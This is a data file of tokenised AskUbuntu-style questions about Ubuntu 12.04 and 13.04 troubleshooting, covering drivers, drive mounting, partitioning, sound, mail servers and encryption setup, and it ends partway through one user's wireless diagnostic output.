336363	intel ( r ) q45/q43 express chipset driver	-- i use ubuntu 12.04 , and i want to install driver for intel ( r ) q45/q43 express chipset intel ( r ) q45/q43 express chipset work fine on my windows xp and i use dual boot ubuntu 12.04 and windows xp btw in my windows it say i have 2 intel ( r ) q45/q43 express chipset in the device manager , and i never install drivers on ubuntu ... .. can you anyone help me ? ? i want to install driver because when i go to system settings/details then i go to graphics i found this driver unknown experience standard
336364	how to get geforce card playing nicely with radeonhd card on 12.04 64bit	i have a on board ati card and a second nvidia card . i really do n't care about what drivers are being used , there will be no 3d gaming , just a dev machine with 3 monitors , 1 on board , 2 on nvidia : /etc/x11 $ lspci | grep vga 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880 [ radeon hd 4200 ] 02:00.0 vga compatible controller : nvidia corporation g72 [ geforce 7200 gs / 7300 se ] ( rev a1 ) currently it 's running libgl1-mesa-dri-lts-quantal and i have display on the internal ati card . i have absolutely nothing on the other two monitors . the xorg.conf is also empty . i tried installing fglrx but lost the gui and spent quite a few hours getting the gui back . can anyone help ?
336375	problems installing ubuntu 12.04 ppc on imac g5	i have an imac g5 powerpc which i 'm trying to install ubuntu 12.04 on . i 'm following this guide and installing the ubuntu from usb flash disk . however , i ca n't go further than `` stopping system v runlevel compatibility '' or `` stopping save kernel messages '' . it just stops there . why is that happening ? any ideas how to solve it ?
336386	how long does it take to install ubuntu ?	for reference , my laptop has an intel celeron 540 processor ( 1.8 ghz ) and 2 gb of ram . i 'm trying to find out if ubuntu 12.04 takes less than 30 minutes to install , my laptop 's battery is total crap and it crashes when it 's on and plugged in ( it 's a sort-of well known hardware issue ) and i ca n't spend the money to get it fixed .
336387	only root can mount /dev/sdb1 on /media/sdb1 - contribute to external usb drive	i ca n't understand why , when i tried plug-in external usb driver in ubuntu 12.04 , i see next message : error mounting : mount exited with exit code 1 : helper failed with : mount : only root can mount /dev/sdb1 on /media/sdb1 here is content of /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=5f5d330f-d5f2-4157-9496-94f1dce2f181 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=84747ef4-6f50-49bc-9df1-fcba364ba299 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdc1 /media/sdc1 vfat uid=1000 , noauto 0 0 /dev/sdd1 /media/sdd1 vfat uid=1000 , noauto 0 0 /dev/sdb1 /media/sdb1 vfat uid=1000 , noauto 0 0 and this is my current sudo fdisk -l : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e28b8 device boot start end blocks id system /dev/sda1 * 2048 310484991 155241472 83 linux /dev/sda2 310487038 312580095 1046529 5 extended /dev/sda5 310487040 312580095 1046528 82 linux swap / solaris disk /dev/sdb : 993 mb , 993001472 bytes 2 heads , 1 sectors/track , 969728 cylinders , total 1939456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdb1 133 1939455 969661+ 6 fat16 disk /dev/sdc : 4009 mb , 4009754624 bytes 16 heads , 32 sectors/track , 15296 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd8e1f237 device boot start end blocks id system /dev/sdc1 * 32 7831551 3915760 b w95 fat32 sdc and sdb - there are external usb drivers . can i solve this trouble and mount all external usb drives automatically ?
336397	bluetooth adapter not found-asus x43u	i 've recently upgraded my distro to raring on asus-x43u , and consequently i 'm unable to use bluetooth . whenever i start bluetooth from dash , i get the following output : no bluetooth adapters found . and also there is no bluetooth indicator in the notification bar . error_screenshot : all fixes would be much appreciated , if any .
336403	what mechanism prevents shutdown when another open session exists ?	the system refuses to shut down or reboot while another ( gui ) session is open . it simply logs me out , when i select shut down or restart from the system menu . how is that accomplished ? i am not asking for a rationale ( it is quite clear that shutting down might have adverse impacts on the work of another user ) but for the mechanism behind this behavior .
336406	copy/paste not working in virtual box with xp as guest os on ubuntu 13.04	unable to copy/paste or drag/drop in sun virtual box with windows xp as guest os on ubuntu 13.04 . i 've already checked the settings to bidirectional . still am unable to execute both the operations .
336411	ubuntu 12.04 postfix/dovecot server can send email but ca n't receive any	my home server is on comcast internet so i 'm successfully using the comcast smarthost to relay my email out to the web . however , all the emails i send back to the box bounce back to me as shown below and i ca n't find any clues in the logs . delivery of a message from you has exceeded the retry time : from : me @ work.com subject : re : not working the following recipients could not be delivered : me @ myhost.ca i 'm using a domain registration site to point myhost.ca at my ip address and i think i 've got my mx record set correctly . this site http : //mxtoolbox.com/supertool.aspx says the following about my mx record . pref hostname ip address ttl 30 myhost.ca xx.xx.xxx.xxx 60 min i 've configured my router to forward the following ports to my ubuntu server : http 80 pop 110 pops 995 imap 143 imaps 993 smtp 25 smtps 465 smtps2 587 fyi the webserver and ssh access both work fine . incoming email seems to be the only thing that is n't working . from the local machine i can telnet to port 25 and 587 and `` helo myhost.ca '' responds as expected . from any machine outside my house telnet wo n't connect to those ports and times out . i expect port 25 is blocked by comcast but i 'm expecting 587 to be useable . can anyone suggest next steps for debugging ? thanks for reading !
336415	the disk drive for /media/sdb1 is not ready or not presented - at running in ubuntu 12.04	when pc is booting i see next message : the disk drive for /media/sdb1 is not ready or not presented continue to wait or press s to skip mounting or m for manual recovery i 'm newly at ubuntu and do n't know well about how it works with eternal usb drives . ( sdb1 is this one ) . here is content of sudo fdisk -l : disk /dev/sda : 160.0 gb , 160041885696 bytes 255 heads , 63 sectors/track , 19457 cylinders , total 312581808 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e28b8 device boot start end blocks id system /dev/sda1 * 2048 310484991 155241472 83 linux /dev/sda2 310487038 312580095 1046529 5 extended /dev/sda5 310487040 312580095 1046528 82 linux swap / solaris disk /dev/sdb : 4009 mb , 4009754624 bytes 16 heads , 32 sectors/track , 15296 cylinders , total 7831552 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xd8e1f237 device boot start end blocks id system /dev/sdb1 * 32 7831551 3915760 b w95 fat32 disk /dev/sdc : 993 mb , 993001472 bytes 2 heads , 1 sectors/track , 969728 cylinders , total 1939456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00000000 device boot start end blocks id system /dev/sdc1 133 1939455 969661+ 6 fat16 and here content of /etc/fstab : # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=5f5d330f-d5f2-4157-9496-94f1dce2f181 / ext4 errors=remount-ro 0 1 # swap was on /dev/sda5 during installation uuid=84747ef4-6f50-49bc-9df1-fcba364ba299 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 /dev/sdc1 /media/sdc1 vfat uid=nazar_art 0 0 /dev/sdb1 /media/sdb1 vfat uid=nazar_art 0 0 /dev/sdd1 /media/sdd1 vfat uid=nazar_art 0 0 - why this exactly happen ? - how to solve this trouble ?
336419	alsamixer shows card but nothing under sound/output	ubuntu 12.04.2 lts toshiba satellite m115-s1061 realtek alc861-vd alsamixer shows my card/chip hda ati sb and realtek alc861-vd however when i open rhythmbox or look at sound settings no device appears under output - play sound through . if i plug in headphones and turn all volume settings in alsamixer up i can hear sound very , very , very faintly ( did i say it was faint ) . the very weird thing is that when i run a very old live cd for slax ( linux 2.6.27.27 ) the sound comes on right away at full normal volume , once the image boots . in examining that environment , it says the audio is coming under oss and not alsa . updates ( additional details ) : the sound card is a realtek high defintion audio bus on the motherboard . based upon what ubuntu shows in alsamixer and windows 2008 shows me all i know is the audio codec is alc861 . pulseaudio -- check - no results returned , command prompt is simply returned . pulseaudio -- dump-conf # # # read from configuration file : /etc/pulse/daemon.conf # # # daemonize = no fail = yes high-priority = yes nice-level = -11 realtime-scheduling = yes realtime-priority = 5 allow-module-loading = yes allow-exit = yes use-pid-file = yes system-instance = no local-server-type = user cpu-limit = no enable-shm = yes flat-volumes = no lock-memory = no exit-idle-time = 20 scache-idle-time = 20 dl-search-path = /usr/lib/pulse-1.1/modules default-script-file = /etc/pulse/default.pa load-default-script-file = yes log-target = auto log-level = notice resample-method = speex-float-1 enable-remixing = yes enable-lfe-remixing = no default-sample-format = s16le default-sample-rate = 44100 default-sample-channels = 2 default-channel-map = front-left , front-right default-fragments = 8 default-fragment-size-msec = 10 enable-deferred-volume = yes deferred-volume-safety-margin-usec = 1 deferred-volume-extra-delay-usec = 0 shm-size-bytes = 0 log-meta = no log-time = no log-backtrace = 0 rlimit-fsize = -1 rlimit-data = -1 rlimit-stack = -1 rlimit-core = -1 rlimit-rss = -1 rlimit-as = -1 rlimit-nproc = -1 rlimit-nofile = 256 rlimit-memlock = -1 rlimit-locks = -1 rlimit-sigpending = -1 rlimit-msgqueue = -1 rlimit-nice = 31 rlimit-rtprio = 9 rlimit-rttime = 1000000 amixer -c 0 simple mixer control 'master',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 64 mono : front left : playback 64 [ 100 % ] [ 0.00db ] [ on ] front right : playback 64 [ 100 % ] [ 0.00db ] [ on ] simple mixer control 'pcm',0 capabilities : pvolume penum playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'mic',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] simple mixer control 'mic boost',0 capabilities : volume penum playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 3 [ 100 % ] [ 30.00db ] front right : 3 [ 100 % ] [ 30.00db ] simple mixer control 'beep',0 capabilities : pvolume pswitch penum playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 31 [ 100 % ] [ 12.00db ] [ off ] front right : playback 31 [ 100 % ] [ 12.00db ] [ off ] simple mixer control 'capture',0 capabilities : cvolume cswitch penum capture channels : front left - front right limits : capture 0 - 31 front left : capture 17 [ 55 % ] [ 12.00db ] [ on ] front right : capture 17 [ 55 % ] [ 12.00db ] [ on ] pacmd dump welcome to pulseaudio ! use `` help '' for usage information . configuration dump generated at fri aug 23 23:15:34 2013 load-module module-device-restore load-module module-stream-restore load-module module-card-restore load-module module-augment-properties load-module module-alsa-card device_id= '' 0 '' name= '' pci-0000_00_14.2 '' card_name= '' alsa_card.pci-0000_00_14.2 '' namereg_fail=false tsched=yes ignore_db=no deferred_volume=yes card_properties= '' module-udev-detect.discovered=1 '' load-module module-udev-detect load-module module-bluetooth-discover load-module module-native-protocol-unix load-module module-gconf load-module module-default-device-restore load-module module-rescue-streams load-module module-always-sink load-module module-intended-roles load-module module-suspend-on-idle load-module module-console-kit load-module module-position-event-sounds load-module module-filter-heuristics load-module module-filter-apply load-module module-switch-on-port-available load-module module-x11-publish display=:0 load-module module-x11-bell display=:0 sample=bell.ogg load-module module-x11-cork-request display=:0 load-module module-x11-xsmp display=:0 session_manager=local/familylaptop : @ /tmp/.ice-unix/1289 , unix/familylaptop : /tmp/.ice-unix/1289 load-module module-cli-protocol-unix set-sink-volume alsa_output.pci-0000_00_14.2.analog-stereo 0x10000 set-sink-mute alsa_output.pci-0000_00_14.2.analog-stereo no suspend-sink alsa_output.pci-0000_00_14.2.analog-stereo yes set-source-volume alsa_output.pci-0000_00_14.2.analog-stereo.monitor 0x10000 set-source-mute alsa_output.pci-0000_00_14.2.analog-stereo.monitor no suspend-source alsa_output.pci-0000_00_14.2.analog-stereo.monitor yes set-source-volume alsa_input.pci-0000_00_14.2.analog-stereo 0x725a set-source-mute alsa_input.pci-0000_00_14.2.analog-stereo no suspend-source alsa_input.pci-0000_00_14.2.analog-stereo yes set-card-profile alsa_card.pci-0000_00_14.2 output : analog-stereo+input : analog-stereo set-default-sink alsa_output.pci-0000_00_14.2.analog-stereo set-default-source alsa_input.pci-0000_00_14.2.analog-stereo eof pactl no valid command specified .
336420	trouble mounting usb 2tb hdd on ubuntu 13.04	upon plugging in the drive i get the message error mounting /dev/sdc1 at /media/okapi/the eagle : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdc1 '' `` /media/okapi/the eagle '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sdc1 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . it was originally used on win 7 & 8 systems . i did the sudo fdisk -l command and found- disk /dev/sdc : 2000.4 gb , 2000365289472 bytes 255 heads , 63 sectors/track , 243197 cylinders , total 3906963456 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x00021365 device boot start end blocks id system /dev/sdc1 * 2048 3906959359 1953478656 7 hpfs/ntfs/exfat okapi @ okapi-1 : ~ $ sudo mount -t ntfs /dev/sdb1 /media mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . okapi @ okapi-1 : ~ $ sudo mount -t ntfs /dev/sdb1 /media mount is denied because the ntfs volume is already exclusively opened . the volume may be already mounted , or another software may use it which could be identified for example by the help of the 'fuser ' command . i have lots of data i wish to keep on this hdd , and really need it atm ... . help ? ? ? ? ? ? ?
336428	how can i assign spanish characters on a french canadian netbook keyboard	i would like to assign alt gr + n to type ñ alt gr + i to type ¡ alt gr + g to type ¿ how can i program those key combinations ? ubuntu 12.04 , mini dell 9 netbook , french canadian keyboard update : i found out about the compose key under settings , keyboard layout , options . i defined it under `` caps lock '' . i can now type an ñ in pressing first caps lock , then pressing alt gr + ~ then pressing n. i still do n't know which key sequence i need to use to type an inverted exclamation '¡ ' or a question mark '¿ ' . can someone help for this one ? 2nd update : i found out about the rest of my question . i press once my defined compose key : caps lock , then i press shift+1 twice to get '¡ ' and shift+6 to get '¿' the other topic regarding the same problem was not detailed enough . i hope mine is . it would be nice to find a map of all possible characters produced with the compose key and the particular keyboard layout .
336438	problems installing 12.04 alongside windows 8	i have a lenovo y400 notebook , and i hate windows 8 . so , i tried to install and dual-boot ubuntu . i immediately ran into problems . first of all , 13.10 wo n't boot . unfortunately , i have n't tried it for a while , so i do n't know the details , but i remember that i immediately switched to 12.04 x64 . i then tried installing ubuntu using the standard installer in efi mode , with secureboot off . it worked , and grub showed up in my boot-devices list . however , the only option that worked was ubuntu recovery -- standard ubuntu and win8 just gave me an orange-brown screen . i tried nomodeset which gave me a working command prompt , but sudo service gdm start did n't do anything , and i 'm not l33t enough to do everything from a command line . so , i tried a few assorted tricks , including booting from a live cd in both efi and legacy . i ca n't use boot-repair as i ca n't connect to wifi -- i will try it when i get hold of an ethernet cable . ubuntu recovery worked fine , but did n't get me anywhere . after some tinkering , i realized that grub was gone from my uefi 's list of boot devices . it had occasionally disappeared before , right after i switched from legacy to uefi , but now it 's gone and does n't want to come back . i know similar posts have been made -- none of the solutions proposed got me anywhere . anything else i can try ? i managed to run boot-repair from the livecd . it failed , giving http : //paste.ubuntu.com/6019512 and saying that i should retry after creating a /boot/efi partition . is this necessary ?
336439	any problems with this partition scheme ?	i must create a new ubuntu 12.04.2 boot disk after the /boot directory on my old hdd got corrupted . the following is the partition scheme i 'm planning . is there anything wrong with this for this system , or anything not wrong but stupid ( too small/large/other ) ? is there any chance the 64mb efi partition might someday be too small ( do more files ever get stored in that partition ) ? 1 : single os - only os is just downloaded 64-bit ubuntu 12.04.2 install dvd . 2 : 3tb drive - boot drive is 3tb sata drive ( 6gbps ) . 3 : pc purpose - software development ( codeblocks ) and email ( thunderbird ) . 4 : system - 8-core amd , 4 sata hard disk drives , 2 sata blu-ray drives . 64mb efi partition 32gb swap partition 64gb ext2 /boot partition 64gb ext4 / ( root ) partition rest ext4 /home partition is this reasonable partitioning for 3tb drive for this purpose ? are all these partitions `` primary partitions '' ( seems like one too many partitions for that , but not sure how this efi stuff works ) .
336442	is it possible to display a keyboard map in terminal ?	i 'd like to be able to display a keyboard map in terminal including dead keys - is it possible ? i wonder if there 's , say , ncurses app able to display the keyboard with mappings listed , possibly with dead keys accents . i know already how to find which layout and model i have enabled . if those are modular , like basic layout being one part and dead keys are another ( e.g . specified in separate files ) , i 'd be happy enough with getting them separate . i have virtually no knowledge on this sort of internals ( which is kinda obvious ) .
336444	been using truecrypt , but trying ecryptfs	i have been using truecrypt with a 32gb filesystem to keep important , personal , private files in . the idea is a stranger getting into my system can not see any of those files , including chrome cache , passwords , etc . working well , but i have discovered ecryptfs and am considering using it becuz it does n't require a fixed size file or filesystem . the way i use truecrypt is when gnome starts i get a prompt ( /etc/gdm3/*session files ) along with a script to mount my truecrypt filesystem . i would like to do similar for ecryptfs . installed it , created my ~/.private and ~/private filesystems with ecryptfs-setup-private and it works . unfortunately , it mounts automatically at login - bad . so , i researched some and see that removing ~/.ecryptfs/wrapped-passphrase disables that capability . but now ecryptfs-mount-private says `` error : encrypted private directory is not setup properly '' - bad . also doing `` sudo mount -t ecryptfs ~/.private ~.private '' makes me answer all the same questions as ecryptfs-setup-private - i even created a file ~/.ecryptfsrc with appropriate stuff in it - no workee . what i would like is for , at gnome startup , for it to ask me for my ( or root ) password and my passphrase similar to what truecrypt does now for me . but , still have to figure out how to get a simple mount or ecryptfs-mount-private to work without hassle before getting there . any similar thoughts or issues ? thanks , jim
336453	help unmounting a disk image	i mounted two iso files with furius iso mount , and then , forgetting about them , closed iso mount , and shut down my laptop . now , they wo n't unmount . they say fstab missing/you are not root . please help ? !
336454	will the multi-touch trackpad on my windows pc still work when i install ubuntu ?	i 'm going to install ubuntu as a dual-boot option on my windows 8 pc . my pc trackpad has multi-touch capability ( two-time scroll , etc ) and i was wondering , will i still have those multi-touch capabilities when using ubuntu ? if not , will there likely be any gestures at all besides simple tapping ? at least something for scrolling ? ? i do n't know the software brand of my my trackpad and k ca n't look out up at the moment . any help us greatly appreciated ! ! ! ! ! ! ! ! ! : )
336455	laptop only has ubuntu , how do i delete it and install windows ?	i bought a asus 1015e laptop with ubuntu as it 's os by accident . i want to delete ubuntu partition and install windows . i went to gparted and i dont know which partition to delete . also asus sells this laptop with windows as well , so i think there is a partition with windows on it already . anyway to delete ubuntu and boot into windows ? if not do i delete all partitions ? thank http : //i.imgur.com/h5c9ovw.jpg ? 1 so i boot into windows setup and delete all partitions , then i cant format the hd to install windows , it says can not install windows , the disk is of gpt partition style . please help . if i try to boot to ubuntu it says error : no such partition grub rescue
336460	how do i fix malformed line in sources list in ubuntu 13.04 ?	e : malformed line 1 in source list /etc/apt/sources.list.d/bitdefender.list ( dist parse ) e : the list of sources could not be read . e : the package lists or status file could not be parsed or opened . how do i fix this ? ? ? driving me crazy and i do n't even have bit-defender on here ...
336466	vlc in ubuntu : display video always on second screen	i am using vlc to play media in a live environment where my second ( or better third ) monitor is connected with an input of the video-mixer . i want to playback vlc videos on that monitor with having everything else on the first monitor . under windows i can set the screen where vlc should play the video in fullscreen . but the option ( a directx-option ) is n't present under ubuntu . when i play a video and then comes a sound and then a video again , the video is placed right next to the playlist . or fullscreen over the playlist . but i want the playlist always to be on screen 1 and the video to be on screen 2 . btw : xubuntu 12.10 with nvidia gtx 670
336469	ubuntu 12.04 freeze while doing `df -h` or `ls` in a mounted cifs	i 'm running ubuntu 12.04 . i have installed samba and cifs fs type . i 'm trying to mount a windows server from ubuntu . i have in my fstab a cifs mount that looks like this : //remote-server/documents /mounts/remote-server cifs user= < user > , passwd= < passwd > , rw , defaults , dir_mask=0777 , file_mask=0777 after a few hours i ca n't execute a df -h. it just hangs . i have to either : umount -l < mount points > or reboot the whole server if i try to ls the mounts directory on the nix machine , it hangs . ( not the sub-mounts , just the list of mount folders ) . it 's bad enough that ctrl-c or ctrl-z does n't work , i have to close the terminal and open a new one .
336472	random mac-address every time i turn on my laptop	i would like to get a random mac-address automatically every time i turn on my laptop . any help is appreciated . p.s . if at all possible a random hostname every startup would be great .
336474	what does /to/ mean in your convert iso to img for mac	what does /to/ mean in convert .iso to .img in your tut for mac osx and can i install ubuntu on mac osx 10.5.8 link to /to/ http : //www.ubuntu.com/download/desktop/create-a-usb-stick-on-mac-osx thanks
336481	tor-browser opens with and unexpected error window	when starting tor-browser i get a error window stating the message below : vidalia detected that the tor software exited unexpectedly . please check the message log for recent warning or error messages . logfiles showing errors : [ warning ] /usr/bin/tor-browser/data/tor is not owned by this user ( myusername , 1000 ) but by root ( 0 ) . perhaps you are running tor as the wrong user ? [ warning ] failed to parse/validate config : could n't access/create private data directory `` /usr/bin/tor-browser/data/tor '' [ error ] reading config failed -- see warnings above . am not allowed to run tor-browser as root , i tried purging it , and reinstalling it again , but same error . i installed tor-browser with the following commands : sudo add-apt-repository ppa : upubuntu-com/tor64 sudo apt-get update sudo apt-get install tor-browser question : how do i get tor-browser to work again ? note : am running ubuntu 13.04 amd64
336484	ubuntu 13.04 installation - need help !	i am installing ubuntu 13.04 . i have the installation open on my screen and it runs fine until i get to a part called `` installation type '' which is basically where i choose a partition . i opened gparted , deleted my windows partition and made a brand new partition so the only partition there is on my hard drive is one ext4 partition that is flagged to boot and it has 500gb . i have another 500gb of unallocated space . basically when i get to this step of the installation , no partitions show up and when i press continue anyway it says this . no root file system defined . please correct this from the partitioning menu . my partition setup : /dev/sda1 - ntfs - hp_recovery - 18gb , unallocated - 450.43gb /dev/sda4 - extended - 452gb then attached to the extended partition it says this underneath : unallocated - unallocated - 1mb /dev/sda5 - ext4 - 452.89gb basically /dev/sda4 is the main partition i want to use and attached to it for some reason is a filesystem that 's ext4 and a random unallocated one . any idea what i did wrong ? i can give more information if needed . output of sudo fdisk -l disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a5604 device boot start end blocks id system /dev/sda1 2048 38143999 19070976 7 hpfs/ntfs/exfat /dev/sda4 * 1003743230 1953523711 474890241 5 extended /dev/sda5 1003745280 1953523711 474889216 83 linux disk /dev/sdb : 8019 mb , 8019509248 bytes 247 heads , 62 sectors/track , 1022 cylinders , total 15663104 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000576ef device boot start end blocks id system /dev/sdb1 * 62 15650907 7825423 b w95 fat32
336485	how to update applications downloaded from the software center	i recently downloaded scala for ubuntu through the software center , however when i check the version i downloaded was scala 2.9.0 , is there anyway i can upgrade/update this to scala 2.10.1 ?
336497	why is the wireless on my 2008 macbook no longer working after upgrading to 12.04 ?	i know this question has been raised a number of times in this forum , but after searching for a solution for nearly 3 hours , i am at my limit . i own a macbook from 2008 ( not a macbook pro ) . i was on 10.04 , but today i upgraded to 12.04 lts . and now , my wireless no longer works . here is my device : 02:00.0 network controller : broadcom corporation bcm4321 802.11a/b/g/n ( rev 03 ) here are some of the things i tried to follow but ultimately did n't work : using additional drivers to get sta . it was n't letting me even download at first . somehow , it let me at some point , but it kept saying `` driver not currently in use . '' http : //techdc.blogspot.com/2011/02/ubuntu-broadcom-wireless-sta-driver.html how to install broadcom wireless drivers firmware-linux-nonfree package through synaptics . b43 i tried a dozen other things which i ca n't even remember . please help ! i also looked at : 6 . ) 2008 macbook wifi not working which basically led to another forum post which led to 4 . ) here is the output of @ wildman 's wireless diagnosis script : *************** info trace *************** ***** uname -a ***** linux doolie 3.2.0-52-generic # 78-ubuntu smp fri jul 26 16:23:24 utc 2013 i686 i686 i386 gnu/linux ***** lsb_release ***** distributor id : ubuntu description : ubuntu 12.04.3 lts release : 12.04 codename : precise ***** lspci ***** 02:00.0 network controller [ 0280 ] : broadcom corporation bcm4321 802.11a/b/g/n [ 14e4:4328 ] ( rev 03 ) subsystem : apple inc. device [ 106b:0088 ] kernel modules : ssb , wl 03:00.0 ethernet controller [ 0200 ] : marvell technology group ltd. 88e8058 pci-e gigabit ethernet controller [ 11ab:436a ] ( rev 13 ) subsystem : marvell technology group ltd. device [ 11ab:00ba ] kernel driver in use : sky2 ***** lsusb ***** bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 05ac:8300 apple , inc. built-in isight ( no firmware loaded ) bus 003 device 003 : id 05ac:8205 apple , inc. bluetooth hci bus 007 device 002 : id 05ac:8242 apple , inc. ir receiver [ built-in ] bus 007 device 003 : id 05ac:0229 apple , inc. internal keyboard/trackpad ( macbook pro ) ( ansi ) ***** pcmcia card info ***** ***** iwconfig ***** ***** rfkill ***** 0 : hci0 : bluetooth soft blocked : yes hard blocked : no ***** lsmod ***** isight_firmware 12586 0 ***** nm-tool ***** networkmanager tool state : connected ( global ) - device : eth0 [ wired connection 1 ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : sky2 state : connected default : yes hw address : < mac address removed > capabilities : carrier detect : yes speed : 100 mb/s wired properties carrier : on ipv4 settings : address : 192.168.1.43 prefix : 24 ( 255.255.255.0 ) gateway : 192.168.1.1 dns : 192.168.1.1 ***** networkmanager.state ***** [ main ] networkingenabled=true wirelessenabled=true wwanenabled=true ***** networkmanager.conf ***** [ main ] plugins=ifupdown , keyfile dns=dnsmasq [ ifupdown ] managed=false ***** interfaces ***** auto lo iface lo inet loopback ***** iwlist ***** ***** resolv.conf ***** nameserver 127.0.0.1 search myhome.westell.com ***** blacklist ***** [ /etc/modprobe.d/blacklist-ath_pci.conf ] blacklist ath_pci [ /etc/modprobe.d/blacklist-bcm43.conf ] blacklist b43 blacklist b43legacy blacklist ssb blacklist bcm43xx blacklist brcm80211 blacklist brcmfmac blacklist brcmsmac blacklist bcma [ /etc/modprobe.d/blacklist.conf ] blacklist evbug blacklist usbmouse blacklist usbkbd blacklist eepro100 blacklist de4x5 blacklist eth1394 blacklist snd_intel8x0m blacklist snd_aw2 blacklist i2c_i801 blacklist prism54 blacklist garmin_gps blacklist asus_acpi blacklist snd_pcsp blacklist pcspkr blacklist amd76x_edac blacklist ssb [ /etc/modprobe.d/libpisock9.conf ] blacklist visor ***** modinfo ***** ***** udev rules ***** # pci device 0x11ab:0x436a ( sky2 ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { type } == '' 1 '' , kernel== '' eth* '' , name= '' eth0 '' # pci device 0x14e4:0x4328 ( ndiswrapper ) subsystem== '' net '' , action== '' add '' , drivers== '' ? * '' , attr { address } == '' < mac address removed > '' , attr { type } == '' 1 '' , kernel== '' wlan* '' , name= '' wlan0 '' ***** dmesg ***** [ 36.874019 ] wl : module license 'mixed/proprietary ' taints kernel . [ 36.877635 ] wl : disagrees about version of symbol cfg80211_scan_done [ 36.877640 ] wl : unknown symbol cfg80211_scan_done ( err -22 ) [ 36.877677 ] wl : disagrees about version of symbol cfg80211_disconnected [ 36.877679 ] wl : unknown symbol cfg80211_disconnected ( err -22 ) [ 36.877702 ] wl : disagrees about version of symbol wiphy_register [ 36.877704 ] wl : unknown symbol wiphy_register ( err -22 ) [ 36.877710 ] wl : disagrees about version of symbol wiphy_new [ 36.877712 ] wl : unknown symbol wiphy_new ( err -22 ) [ 36.877717 ] wl : disagrees about version of symbol cfg80211_roamed [ 36.877719 ] wl : unknown symbol cfg80211_roamed ( err -22 ) [ 36.877728 ] wl : disagrees about version of symbol lib80211_get_crypto_ops [ 36.877730 ] wl : unknown symbol lib80211_get_crypto_ops ( err -22 ) [ 36.877739 ] wl : disagrees about version of symbol cfg80211_ibss_joined [ 36.877742 ] wl : unknown symbol cfg80211_ibss_joined ( err -22 ) [ 36.877751 ] wl : disagrees about version of symbol cfg80211_michael_mic_failure [ 36.877753 ] wl : unknown symbol cfg80211_michael_mic_failure ( err -22 ) [ 36.877757 ] wl : disagrees about version of symbol cfg80211_connect_result [ 36.877759 